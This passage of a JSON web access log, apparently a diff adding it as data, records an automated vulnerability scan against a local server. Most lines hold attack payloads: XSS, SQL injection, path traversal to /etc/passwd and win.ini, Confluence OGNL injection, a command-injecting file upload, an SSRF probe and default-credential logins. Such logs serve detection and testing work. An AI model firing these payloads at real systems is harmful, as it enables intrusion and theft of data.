+%22%22%2C+%22Jenkins-Crumb%22%3A+%224412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96%22%7D&Submit=Search HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sample.htaccess HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /services/pluginscript/..;/..;/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log/error.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"more=0&host=0&username=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&password=&db=&lang=en_us&expire=3","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index.php?action=login.index HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /weibo/topic/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/data/autosuggest-remote.php?q=\x22> HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /swagger/ui/index HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /editor.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cfide/administrator/images/componentutilslogin.jpg HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?swfloc=%22%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webacs/pages/common/login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webmail/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jenkins/descriptorByName/AuditTrailPlugin/regexCheck?value=*j%3Ch1%3Esample HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /v1/tasks HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /file=C:%5CWindows%5Cwin.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /printenv.shtml?%3Cscript%3Ealert(%27xss%27)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /application.wadl HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"email=%27%3D%27%27or%27%40email.com&password=%27%3D%27%27or%27&btn_login=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1/login.php", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /logs/awstats.pl HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?return_url=javascript:alert(document.domain) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wan.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /phpmyadmin/scripts/setup.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /web_caps/webCapsConfig HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /a.htaccess HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"name=Admin&password=zabbix&autologin=1&enter=Sign+in","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log/debug.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /shindig/gadgets/proxy?container=default&url=http://oast.pro HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tiki-login_scr.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /swagger/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mysql.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mgmt/shared/authn/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /gotoURL.asp?url=example.com&id=43569 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-----------------------------31046105003900160576454225745\x0D\x0AContent-Disposition: form-data; name=\x22fileToUpload\x22; filename=\x22297MFjoSAXZTWxJSxQcixzrF6Yd.php\x22\x0D\x0AContent-Type: image/gif\x0D\x0A\x0D\x0AGIF89a213213123$(id>webLib/x)","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"PUT /SDK/webLanguage HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"PUT", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_multimap&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mobile/plugin/SyncUserInfo.jsp?userIdentifiers=-1)union(select(3),null,null,null,null,null,str(98989*44313),null HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api-docs/swagger.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /command.cgi?cat%20/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:56 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /confluence/pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pureweb/server/login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_perchafieldsattach&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /php_info.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /frontend/web/debug/default/view HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"OPTIONS / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"OPTIONS", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/users/admin?fields=*,privileges/PrivilegeInfo/cluster_name,privileges/PrivilegeInfo/permission_name HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /./../../../../../../../../../../windows/win.ini HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /web/phpmyadmin/scripts/setup.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /secureader/javax.faces.resource/web.xml?loc=../WEB-INF HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jasperserver/login.html?error=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /access/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?mp_idx=%22;alert(%271%27);// HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_vti_inf.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /x HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jimtawl&Itemid=12&task=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /signEzUI/playlist/edit/upload/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pem/login/pages/login.jsf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/e-search/tmpl/date_select.php?date-from=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api-docs/swagger.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:56 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /confluence/pages/createpage-entervariables.action HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login 